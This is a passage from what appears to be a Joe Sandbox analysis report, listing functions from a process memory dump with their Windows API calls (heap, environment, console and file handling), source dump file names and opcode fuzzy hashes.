                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                      • String ID:
                                                      • API String ID: 140117192-0
                                                      • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                      • Instruction ID: 83bc1b35d196cbaa29b8837324daef3cc31710991912e68987bfb88e021a2f78
                                                      • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                      • Instruction Fuzzy Hash: ED41E635A08F0281EB58EB08F882365B3A4FB88755FD09137DA8D86764DFBDE454C721
                                                      Function 00007FF7E1DC8470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcstol$lstrcmp
                                                      • String ID:
                                                      • API String ID: 3515581199-0
                                                      • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                      • Instruction ID: 1f1bc9820bcd32f17831dbf875035cf3b4da619a652d768192505653d1addbe7
                                                      • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                      • Instruction Fuzzy Hash: 5C210532A1C64283E760EB399095639EBA0FB49740F82543ADB4F02654CFFCF490C361
                                                      Function 00007FF7E1DB4F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File_get_osfhandle$TimeWrite
                                                      • String ID:
                                                      • API String ID: 4019809305-0
                                                      • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                      • Instruction ID: 494311eddd180b83f490c7cba38419efac7d7158260a26952058fcb188cf9ae8
                                                      • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                      • Instruction Fuzzy Hash: 3931C422A0878286E794EB14948633DF790FF49BA0F85A33AD94E437D5CFBCE4558712
                                                      Function 00007FF7E1DE1914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$DriveNamePathTypeVolume
                                                      • String ID:
                                                      • API String ID: 1029679093-0
                                                      • Opcode ID: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                      • Instruction ID: d39c0115cf8cafc962e48f59f97dc0ef2501ea764abbde70a4259f2ecc56c814
                                                      • Opcode Fuzzy Hash: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                      • Instruction Fuzzy Hash: 73315A32B05A818AEB24DF21D8563E8A7A0FB89B85F848136CA4D8BB44DF7CD645C711
                                                      Function 00007FF7E1DDE810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 2448200120-0
                                                      • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                      • Instruction ID: 5f3b791abb8b9e46b96c73d998ed739eccc0b42f2d47152f2f3ade92c81db239
                                                      • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                      • Instruction Fuzzy Hash: 83214C31E08B4697E714FB11A402379F6A1FBC8B81F85423AD90E47794CFBCE4118B22
                                                      Function 00007FF7E1DC7CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                      • Instruction ID: 3b49d2bb69e0262cf8224318908c21b29e493a0c8cd54ef8c8a020a4741fe170
                                                      • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                      • Instruction Fuzzy Hash: D621F461A08B42C2EF04EB15A901179F7A1FF89BE1B959632DE1E03395DF7CE0018361
                                                      Function 00007FF7E1DB6A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DC3D0C
                                                        • Part of subcall function 00007FF7E1DC3C24: towupper.MSVCRT ref: 00007FF7E1DC3D2F
                                                        • Part of subcall function 00007FF7E1DC3C24: iswalpha.MSVCRT ref: 00007FF7E1DC3D4F
                                                        • Part of subcall function 00007FF7E1DC3C24: towupper.MSVCRT ref: 00007FF7E1DC3D75
                                                        • Part of subcall function 00007FF7E1DC3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC3DBF
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DB6ABF
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DB6AD3
                                                        • Part of subcall function 00007FF7E1DB6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7E1DB6AE8,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B8B
                                                        • Part of subcall function 00007FF7E1DB6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7E1DB6AE8,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B97
                                                        • Part of subcall function 00007FF7E1DB6B84: RtlFreeHeap.NTDLL ref: 00007FF7E1DB6BAF
                                                        • Part of subcall function 00007FF7E1DB6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB6AF1,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B39
                                                        • Part of subcall function 00007FF7E1DB6B30: RtlFreeHeap.NTDLL ref: 00007FF7E1DB6B4D
                                                        • Part of subcall function 00007FF7E1DB6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB6AF1,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B59
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DB6B03
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DB6B17
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                      • String ID:
                                                      • API String ID: 3512109576-0
                                                      • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                      • Instruction ID: 17d18de5e14ca10350adfa32aa2996a0f90b2cd1ac54c7dd49fc07f285246e8a
                                                      • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                      • Instruction Fuzzy Hash: 8D21BF62A08A8295EF05FF2594023B8BBA0EB59B45F988033C91E83351DF7C9445C372
                                                      Function 00007FF7E1DBB6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB6D0
                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB6E7
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB701
                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB715
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocSize
                                                      • String ID:
                                                      • API String ID: 2549470565-0
                                                      • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                      • Instruction ID: 571ec14e998341a004c35bb6ac4a439367390e3f58948ef0e1355a89bf5dbd93
                                                      • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                      • Instruction Fuzzy Hash: 46213062A09786A6EF15EB11E441678F6A1FB89B80BDC9432DA0F03754DFBCE941C721
                                                      Function 00007FF7E1DDCFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E1DC507A), ref: 00007FF7E1DDD01C
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E1DC507A), ref: 00007FF7E1DDD033
                                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E1DC507A), ref: 00007FF7E1DDD06D
                                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E1DC507A), ref: 00007FF7E1DDD07F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                      • String ID:
                                                      • API String ID: 1033415088-0
                                                      • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                      • Instruction ID: 5ad64a764c7d74ff8db13a4b38af0831a795334048b46bb5c34826f0268bae33
                                                      • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                      • Instruction Fuzzy Hash: EE118631618A5287DB44EB10F05527AF7A0FB8EB95F845136EA8E47B94DF7CD0458B10
                                                      Function 00007FF7E1DB59E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC1EA0: wcschr.MSVCRT(?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7E1DE0D54), ref: 00007FF7E1DC1EB3
                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DB5A2E
                                                      • _open_osfhandle.MSVCRT ref: 00007FF7E1DB5A4F
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF7E1DB260D), ref: 00007FF7E1DD37AA
                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7E1DD37D2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                      • String ID:
                                                      • API String ID: 22757656-0
                                                      • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                      • Instruction ID: 61744d3f2ad8b46befc6766ce7b50e69c15f729ef14ca400901f7f53588df6c8
                                                      • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                      • Instruction Fuzzy Hash: EA11E772A0464597E710EB24E44933DBAA0FB8AB75FA48335D62E473D0CF7CD4498B10
                                                      Function 00007FF7E1DD5690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7E1DD5433,?,?,?,00007FF7E1DD69B8,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD56C5
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD56D9
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7E1DD5433,?,?,?,00007FF7E1DD69B8,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD56FD
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD5711
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                      • Instruction ID: cc9ee712fcb45e9e591c36c146fc6c95fb86678877c0b0cef4b1eb6d2d983d9a
                                                      • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                      • Instruction Fuzzy Hash: 50112572A04B81D6EB04AF56E4041A8BBB0FB89F85B988136DB4E03718DF38E456C750
                                                      Function 00007FF7E1DC9158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                      • String ID:
                                                      • API String ID: 140117192-0
                                                      • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                      • Instruction ID: 1165895eceb500f55a2466649f1fcbf9f09c337d1f6e99fdc8cd38e38157d823
                                                      • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                      • Instruction Fuzzy Hash: F621D435D08F4285E748EB04F882369B3A4FB88B55F909136EA8D87B64DFBDE444C721
                                                      Function 00007FF7E1DC4AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AD6
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AEF
                                                        • Part of subcall function 00007FF7E1DC4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A28
                                                        • Part of subcall function 00007FF7E1DC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A66
                                                        • Part of subcall function 00007FF7E1DC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A7D
                                                        • Part of subcall function 00007FF7E1DC4A14: memmove.MSVCRT(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A9A
                                                        • Part of subcall function 00007FF7E1DC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4AA2
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DCEE64
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DCEE78
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                      • String ID:
                                                      • API String ID: 2759988882-0
                                                      • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                      • Instruction ID: 567964930ba76a32a938d1862c05fe4f1771baacec405612afa27c4989fefbf7
                                                      • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                      • Instruction Fuzzy Hash: B4F04F60F05B42D6EF09FB659406278EDD1FF8EB42B88C475CD0E82350EE7CA4048722
                                                      Function 00007FF7E1DDF22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
